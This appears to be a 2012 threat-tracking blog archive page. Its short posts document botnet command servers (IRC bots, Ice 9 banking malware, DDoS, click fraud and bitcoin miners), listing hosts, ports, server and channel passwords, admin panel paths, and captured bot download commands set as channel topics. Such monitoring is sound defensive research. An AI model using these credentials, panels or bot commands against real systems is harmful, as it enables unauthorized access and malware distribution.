Month: December 2012

w4hw5wg3488h.net (snk asper mod botnet hosted by United Kingdom Birmingham Compuweb Communications Services Limited)

Uncategorized

Resolved w4hw5wg3488h.net to 62.255.175.157 snk is back, using an old domain and buying bots from Heckforums skids. Server:   w4hw5wg3488h.net Port:  5050 Channel:  #$ * Topic for #$ is: , * Topic for #$ set by x at Sat Dec 22 16:42:47 2012 Channel:  #lol * Topic for #lol is: .d /100/97/111/124/49/59/47/105/111/111/102/66/103/119/105/115/118/101/109/120/103/126/56/111/112/38/112/78/51/100/111/62/70/112/98/ * Topic forRead more...

bootcamp4wealth.com (Ice 9 banking malware hosted by wiredtree.com)

Uncategorized

Resolved bootcamp4wealth.com to 173.199.181.60 Server:   bootcamp4wealth.com Gate file:  bootcamp4wealth.com/wp-directory/images/config/adm/gate.php Config file:  bootcamp4wealth.com/wp-directory/images/config/config/index.php Login page:  bootcamp4wealth.com/wp-directory/images/config/adm/index.php?m=login Anyone infected with this is safe for now as the owner hasn’t figured out that the bot and config dropper need the same key for it to work. Hosting infos: http://whois.domaintools.com/173.199.181.60

qwer.be (YZF ddos botnet hosted by metrabyte.co.th)

Uncategorized

Resolved qwer.be to 119.59.99.200 Server:  qwer.be Gate file:  /1234567/cmd.php Information for building http requests is stored in /1234567/sys/ as text files renamed to pngs. http://qwer.be/1234567/sys/UserAgent.png Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer) Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322) Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Read more...

x.n-0-r-1.org (ngr irc botnet hosted by Russian Federation Saint Petersburg Selectel Ltd.)

Uncategorized

This botnet has lots of domains, none of which are resolving at the moment. x.n-0-r-1.org x.n0r1.org x.n2rx.asia x.n1rx.asia x.n0r2.asia x.n0r1.asia x.dload.ws x.xd11.in You can still connect to the server using it’s ip address though.. Server:  31.186.102.189 Port:  80 Server password:  666666 Channel:   ##CBC-x01## * Topic for ##CBC-x01## is: !m on !mod usbi on !NAZELRead more...

www.btcminers.biz(Bit Coin Miner hosted in Russian Federation Saint Petersburg Selectel Ltd.)

Uncategorized

Resolved : [www.btcminers.biz] To [31.186.102.189] Resolved : [www.btcminers.biz] To [31.186.102.182] http://www.btcminers.biz:789/ -u m2n3r_A -p refghvytre  | POST / HTTP/1.1.  | .Authorization:  | Basic bTJuM3JfQT A | pyZWZnaHZ5dHJl..  | Content-Length:  | 43..User-Agent:  | Ufasoft bitcoin-  | miner/0.20 (Wind  | ows NT XP 5.1.26  | 00 Service Pack  | 2) ..Host: local  | host:789..Cache-  | Control: no-cachRead more...

f0010.info (ngr irc botnet hosted by perfectip.net)

Uncategorized

Resolved f0010.info to 64.56.64.29, 64.56.64.26 Server:  f0010.info Port:  1887 Server Password:   leonis Channel:  #pool Channel password:  leonis * Topic for #pool is: ~pu hxxp://www.sendspace.com/pro/dl/ishh04 1f88bb85c51290b759d16dda9fff692d ~s -o ~s * Topic for #pool set by google at Mon Dec 17 12:16:33 2012 Bots also join the channel for their county, eg #US, and operating system,Read more...

bid.consulting-info.eu (Click fraud botnet hosted by quadranet.com)

Uncategorized

Resolved bid.consulting-info.eu to s1.fclick.org (cname) Resolved s1.fclick.org to 96.44.149.187 Server:   bid.consulting-info.eu Gate file:  /feed/xml.php?uid=219   More click fraud courtesy of french hecker h4r3. This time it looks a bit more sophisticated though. I’m assuming this is an affiliate program as while it’s using h4r3’s domain it points to another site. If you search forRead more...

74.208.111.48 (HEX reptile mod hosted by 1and1.com)

Uncategorized

ALiSs has found a new net Server:  74.208.111.48 Port:  1866 Channel:  #!h! * Topic for #!h! is: .load /99/106/112/81/55/59/40/105/121/99/108/102/45/111/98/115/102/103/110/97/108/101/120/8/64/119/114/53/122/126/122/126/117/113/100/83/46/112/124/64/40/46/102/126/105/ * Topic for #!h! set by wweras at Fri Dec 14 20:55:55 2012 Hosting infos:  http://whois.domaintools.com/74.208.111.48